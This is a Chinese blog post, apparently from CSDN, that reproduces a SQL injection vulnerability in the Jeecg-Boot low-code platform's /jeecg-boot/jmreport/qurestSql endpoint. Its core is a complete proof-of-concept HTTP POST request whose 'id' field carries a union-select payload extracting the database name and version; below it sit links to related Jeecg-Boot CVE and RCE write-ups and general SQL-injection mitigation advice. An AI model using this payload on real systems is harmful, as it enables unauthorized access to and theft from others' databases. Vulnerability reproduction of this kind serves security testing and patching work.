Jeecg-Boot /jeecg-boot/jmreport/qurestSql接口sql注入漏洞复现

最新推荐文章于 2024-04-12 05:37:30 发布
最新推荐文章于 2024-04-12 05:37:30 发布
阅读量2.6k 收藏 1
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45908624/article/details/132800250
版权

一、Jeecg-Boot介绍

JeecgBoot 是一款基于代码生成器的低代码开发平台!前后端分离架构 SpringBoot2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发! JeecgBoot 引领新的低代码开发模式(OnlineCoding-> 代码生成器-> 手工MERGE), 帮助解决Java项目70%的重复工作,让开发更多关注业务。既能快速提高效率,节省研发成本,同时又不失灵活性。

二、漏洞复现

Jeecg-Boot 的/jeecg-boot/jmreport/qurestSql接口存在sql注入漏洞,url访问 /jeecg-boot/jmreport/qurestSql出现如下页面

开启抓包工具,修改请求报文方式为POST,并修改数据包,执行查询出了目标数据库名称和数据库版本。

POC如下:

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xx.xx.xx.xx:xxxx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 131

{"apiSelectId": "1290104038414721025", "id": "1' union all select 1,2,database(),version(),5,6,7 from rep_demo_gongsi where id='1"}

LZ_KaiHuang
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jeecg-Boot 存在前台SQL注入漏洞(CVE-2023-1454)
nnn2188185的博客
04-10 5944
jeecg-boot 3.5.0版本存在SQL注入漏洞,该漏洞源于文件 jmreport/qurestSql 存在安全问题, 通过参数 apiSelectId 导致SQL注入
漏洞复现Jeecg-Boot SQL注入漏洞(CVE-2023-34659)
失心少年
09-26 686
强大的代码生成器让前后端代码一键生成,实现低代码开发!JeecgBoot引领新低代码开发模式 OnlineCoding-> 代码生成器-> 手工MERGE, 帮助Java项目解决70%的重复工作,让开发更多关注业务,既能快速提高效率,节省研发成本,同时又不失灵活性!技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!
漏洞分析|jeecg-boot 未授权SQL注入漏洞(CVE-2023-1454)
xuandaoren的博客
12-31 2426
jeecg-boot-base-core/src/main/java/org/jeecg/common/util/SqlInjectionUtil.java中增加了对sql语句的正则。JeecgBoot的代码生成器是一种可以帮助开发者快速构建企业级应用的工具,它可以通过一键生成前后端代码,无需写任何代码,让开发者更多关注业务逻辑。更改了72处的文件,其中需要注意db/其他数据库/jeecgboot-sqlserver2019.sql中重写了数据插入的方法。建议更新当前系统或软件至最新版,完成漏洞的修复。
Goby漏洞更新 jeecg-boot 未授权SQL注入漏洞(CVE-2024-1454)
2401_84247760的博客
04-12 514
感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
JEECG-BOOT存在SQL注入漏洞[附POC]
Liyu_6618的博客
02-01 992
JEECG-BOOT存在SQL注入漏洞[附POC]
JEECGBOOT代码SQL漏洞处理方案.zip
06-21
漏洞编码:HW21-0499 产品名字:JeecgBoot低代码平台 问题: JEECG系统存在SQL注入0day漏洞
漏洞复现--JeecgBoot testConnection 远程代码执行
qq_53003652的博客
12-20 2095
JeecgBoot 是一款基于代码生成器的低代码开发平台,该产品存在testConnection 远程命令执行漏洞。JeecgBoot积木报表。
Jeecg-Boot 存在前台SQL注入漏洞【CVE-2023-1454】
holyxp的博客
07-02 4281
eecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发!JeecgBoot引领新低代码开发模式 OnlineCoding-> 代码生成器-> 手工MERGE, 帮助Java项目解决70%的重复工作,让开发更多关注业务,既能快速提高效率,节省研发成本,同时又不失灵活性!
Goby漏洞更新 | jeecg-boot 未授权SQL注入漏洞(CVE-2023-1454)
m0_46699477的博客
03-24 1904
jeecg-boot 未授权SQL注入漏洞(CVE-2023-1454)
JeecgBoot jmreport/queryFieldBySql RCE漏洞复现
0xSec
12-12 1978
Jeecg Boot jmreport/queryFieldBySql接口存在代码执行漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。这种漏洞可能会导致整个应用程序被入侵,造成严重的安全问题。
JeecgBootSql二次注入复现
weixin_45803562的博客
03-23 1298
漏洞复现
Jeecg-Boot技术文档
03-24
Jeecg-Boot是一款基于BPM的低代码平台,零代码开发!采用前后端分离架构: SpringBoot 2.x,Ant Design&Vue,Mybatis-plus,Shiro,JWT。强大的代码生成器让前后端代码一键生成,无需写任何代码!!帮助Java项目解决...
jeecg-boot 集成Activiti6 页面
10-26
jeecg-boot 前后分离 集成Activiti6 页面
基于jeecg-boot-activiti的Vue工作流管理系统设计源码
最新发布
04-12
本Vue工作流管理系统基于jeecg-boot-activiti开源项目开发,包含1928个文件,包括Java源代码、SQL脚本、Vue组件、PNG图片、JavaScript脚本、BCMAP文件、Java源代码、HTML页面、XML配置文件、JSON配置文件。...
jeecg-boot 安装部署.docx
06-04
Jeecg-Boot 是一款基于SpringBoot+代码生成器的快速开发平台!采用前后端分离架构:SpringBoot,Mybatis,Shiro,JWT,Vue&Ant Design。强大的代码生成器让前端和后台代码一键生成,不需要写任何代码,保持jeecg一贯...
JEECG-BOOT 企业级快速平台产品介绍PPT-20200327_jeecg-boot_jeecg_
10-02
Jeecg-Boot的PPT讲解以及介绍,对于新手非常有用
jeect-boot queryFieldBySql接口RCE漏洞(CVE-2023-4450)复现
fly夏天的博客
03-20 2292
jeect-boot queryFieldBySql接口RCE漏洞(CVE-2023-4450)复现
【高危】 jeecg-boot/积木报表基于H2驱动的任意代码执行漏洞
murphysec的博客
08-17 963
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。产品可以极低成本的和现有开发流程中的各种工具一键打通,包括 IDE、Gitlab、Bitbucket、Jenkins、Harbor、Nexus 等数十种工具无缝集成。
Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)
qq_50854662的博客
05-24 1593
Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)
jeecg-boot sql注入
12-14
Jeecg-boot是一款基于Spring Boot和Mybatis-Plus开发的快速开发平台。在使用Jeecg-boot时,尤其是在进行数据库操作时,需要注意防范SQL注入攻击。 SQL注入是一种常见的安全漏洞,攻击者通过在输入框或URL参数中注入恶意的SQL语句,以达到绕过系统验证和获取非授权信息的目的。对于Jeecg-boot来说,防止SQL注入攻击的措施主要包括以下几点: 1. 参数校验与过滤:在接收和处理用户输入的数据时,应进行合法性检查和过滤。例如,可以使用正则表达式对输入数据进行验证,并排除可能的恶意字符。 2. 使用参数化查询:对于用户输入的数据,尽量使用参数化查询(Prepared Statement),而不是拼接SQL语句。参数化查询可以将输入的数据当作参数传递给数据库,避免了直接将用户输入拼接到SQL语句中的风险。 3. 权限控制:在系统设计和开发中,要根据用户角色和权限设置合适的数据访问权限。做到只有授权的用户才能执行特定的数据库操作,从而减少了注入攻击的可能性。 4. 使用ORM框架:Jeecg-boot默认使用Mybatis-Plus作为持久层框架,Mybatis-Plus提供了ORM(对象关系映射)功能,可以有效地避免SQL注入攻击。ORM框架会将对象与数据库表进行映射,自动生成SQL语句,减少手动编写SQL的机会。 综上所述,为了防止Jeecg-boot发生SQL注入,我们可以采取参数校验与过滤、使用参数化查询、权限控制以及使用ORM框架等措施。同时,在开发和维护过程中,还应关注相关安全漏洞的更新和修复,提高系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值